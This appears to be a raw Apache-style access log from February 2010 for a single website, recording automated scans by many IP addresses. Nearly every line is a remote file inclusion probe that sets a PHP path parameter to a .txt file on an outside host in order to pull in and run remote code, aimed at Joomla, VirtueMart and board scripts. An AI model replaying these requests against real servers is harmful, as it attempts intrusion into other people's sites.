90.176.234.205 - - [20/Feb/2010:06:53:16 -0800] "GET /help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:53:21 -0800] "GET /logs/access_100204.log%20%20//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:53:22 -0800] "GET /logs//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:53:37 -0800] "GET /logs/com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:53:37 -0800] "GET /logs/access_100114.log%20%20/com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:53:37 -0800] "GET /com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:53:39 -0800] "GET /logs/com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:53:39 -0800] "GET /logs/access_100114.log%20%20/com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:53:40 -0800] "GET /com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:53:56 -0800] "GET /logs/access_100127.log%20%20/errors.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:53:56 -0800] "GET /errors.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:53:56 -0800] "GET /logs/errors.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [20/Feb/2010:06:53:58 -0800] "GET /logs/access_100210.log%20//components/com_artref/artref.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:27 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:27 -0800] "GET /logs/access_100206.log%20%20///bbs/write_update.php?board_skin_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:27 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:30 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:30 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:30 -0800] "GET /logs/access_100124.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:30 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:54:39 -0800] "GET /logs/access_100127.log%20%20/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:55:06 -0800] "GET /logs/access_100119.log%20%20/com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:55:21 -0800] "GET /logs/access_100119.log%20%20/com/bbs//skin/jaemanstyle_s01_blue////=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [20/Feb/2010:06:55:22 -0800] "GET /logs/access_100204.log%20%20//help.php?css_path=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [20/Feb/2010:06:55:22 -0800] "GET /logs//help.php?css_path=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [20/Feb/2010:06:55:22 -0800] "GET /help.php?css_path=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [20/Feb/2010:06:55:37 -0800] "GET /help.php?css_path=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [20/Feb/2010:06:55:37 -0800] "GET /logs/access_100204.log%20%20//help.php?css_path=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [20/Feb/2010:06:55:38 -0800] "GET /logs//help.php?css_path=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:55:44 -0800] "GET /help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:55:44 -0800] "GET /logs/access_100204.log%20%20//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [20/Feb/2010:06:55:47 -0800] "GET /logs//help.php?css_path=http://www.etecerqueira.com.br/modules/xt_conteudo//language/russian/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.112 - - [20/Feb/2010:06:55:50 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imtag.php?mosConfig_absolute.path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [20/Feb/2010:06:55:50 -0800] "GET /components/com_virtuemart/show_image_in_imtag.php?mosConfig_absolute.path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.112 - - [20/Feb/2010:06:55:51 -0800] "GET /logs//components/com_virtuemart/show_image_in_imtag.php?mosConfig_absolute.path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:56:08 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:56:08 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:56:08 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:58:30 -0800] "GET /logs/access_100127.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:58:54 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:58:54 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:58:54 -0800] "GET /logs/access_100114.log//modules/vwar/admin/admin.php?vwar_root=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:58:58 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:58:58 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:58:58 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:58:58 -0800] "GET /logs/access_100125.log//modules/vwar/admin/admin.php?vwar_root=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:59:33 -0800] "GET /logs/access_100127.log/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:59:43 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:59:43 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:59:44 -0800] "GET /logs/access_100129.log/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:59:44 -0800] "GET /logs/access_100208.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:00:14 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:00:14 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:00:15 -0800] "GET /logs/access_100208.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:00:27 -0800] "GET /logs/access_100119.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:07:00:59 -0800] "GET /logs/access_100119.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:01:49 -0800] "GET /logs/access_100208.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:01:49 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:01:49 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:02:28 -0800] "GET /logs/access_100119.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:04:05 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:04:05 -0800] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:04:10 -0800] "GET /logs/access_100208.log//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:04:16 -0800] "GET /logs/access_100119.log//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:04:16 -0800] "GET /logs/access_100114.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:04:16 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:04:17 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:04:17 -0800] "GET /logs/access_100209.log//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:04:17 -0800] "GET /bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:04:25 -0800] "GET /logs/access_100114.log%20%20/com_virtuemart/errors.php?error=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:04:25 -0800] "GET /logs/com_virtuemart/errors.php?error=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:04:25 -0800] "GET /com_virtuemart/errors.php?error=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:04:31 -0800] "GET /com_virtuemart/errors.php?error=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:04:52 -0800] "GET /logs/access_100201.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [20/Feb/2010:07:04:59 -0800] "GET /logs/access_100208.log//bbs//skin/zero_vote/login.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:05:06 -0800] "GET /logs/access_100114.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:05:06 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:05:06 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:05:35 -0800] "GET /logs/access_100201.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:07:40 -0800] "GET /logs/index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:07:40 -0800] "GET /logs/access_100206.log%20%20/index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:07:40 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:00 -0800] "GET /logs/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:00 -0800] "GET /toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:00 -0800] "GET /logs/access_100121.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:05 -0800] "GET /logs/access_100127.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:09 -0800] "GET /logs/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:09 -0800] "GET /logs/access_100121.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:09 -0800] "GET /toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:07:08:15 -0800] "GET /logs/access_100127.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:08:48 -0800] "GET /logs/index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:08:48 -0800] "GET /logs/access_100206.log%20%20/index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:08:48 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:07:09:42 -0800] "GET /logs/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:07:09:42 -0800] "GET /logs/access_100207.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:07:09:42 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:09:45 -0800] "GET /logs/access_100205.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:09:51 -0800] "GET /logs/access_100201.log%20%20/index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:10:00 -0800] "GET /logs/access_100203.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:10:35 -0800] "GET /logs/access_100201.log%20%20/index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:11:06 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:11:06 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:11:06 -0800] "GET /logs/access_100208.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:28 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:28 -0800] "GET /logs/access_100208.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:28 -0800] "GET /logs/access_100208.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:28 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:51 -0800] "GET /logs/access_100217.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.11.58 - - [20/Feb/2010:07:11:51 -0800] "GET /logs/access_100217.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pnplove.co.kr/zero/bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:13:03 -0800] "GET /logs/access_100207.log%20%20/com_virtuemart/errors.php?error=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:13:12 -0800] "GET /logs/access_100207.log%20%20/com_virtuemart/errors.php?error=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:13:35 -0800] "GET /logs/access_100210.log/secure.php?&cfgProgDir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
